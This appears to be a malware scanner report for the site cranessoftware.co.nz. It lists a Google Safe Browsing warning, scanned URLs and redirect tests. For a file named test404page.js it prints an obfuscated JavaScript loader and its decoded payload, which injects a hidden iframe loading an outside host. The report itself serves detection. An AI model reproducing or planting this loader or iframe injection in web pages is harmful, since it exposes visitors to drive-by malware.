Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cranessoftware.co.nz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.cranessoftware.co.nz/ | 403 Forbidden Content-Length: 5043 Content-Type: text/html | clean |
http://www.cranessoftware.co.nz/test404page.js | 404 Not Found Content-Length: 27185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function JODI(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(JODI()>100000){function qArhFjyvWg(soEm){var CcySlu=4,vcN=5;var QdlNbSLt='122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+164-0+120-4+112-0+112-0+165-3+',AMT=QdlNbSLt.split(' ...[1884 bytes skipped]... Decoded script: document['w5272r5870i6451t4260e74276221'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://purgand.com/in5.php\'></iframe>'); document['w5272r5870i6451t4260e74276221'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://purgand.com/in5.php\'></iframe>'); /*** called setTimeout with document['w5272r5870i6451t4260e74276221'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://purgand.com/in5.php\'></iframe>');, 57 */ <iframe width=1 height=1 border=0 frameborder=0 src='http://purgand.com/in5.php'></iframe> Antivirus reports:
| ||
http://luksussmykker.dk/libraries/configuration.php | 404 Not Found Content-Length: 225 Content-Type: text/html | clean |
http://luksussmykker.dk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cranessoftware.co.nz
Result:
GET / HTTP/1.1
Host: cranessoftware.co.nz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cranessoftware.co.nz
Referer: http://www.google.com/search?q=cranessoftware.co.nz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cranessoftware.co.nz
Referer: http://www.google.com/search?q=cranessoftware.co.nz
Result:
The result is similar to the first query. There are no suspicious redirects found.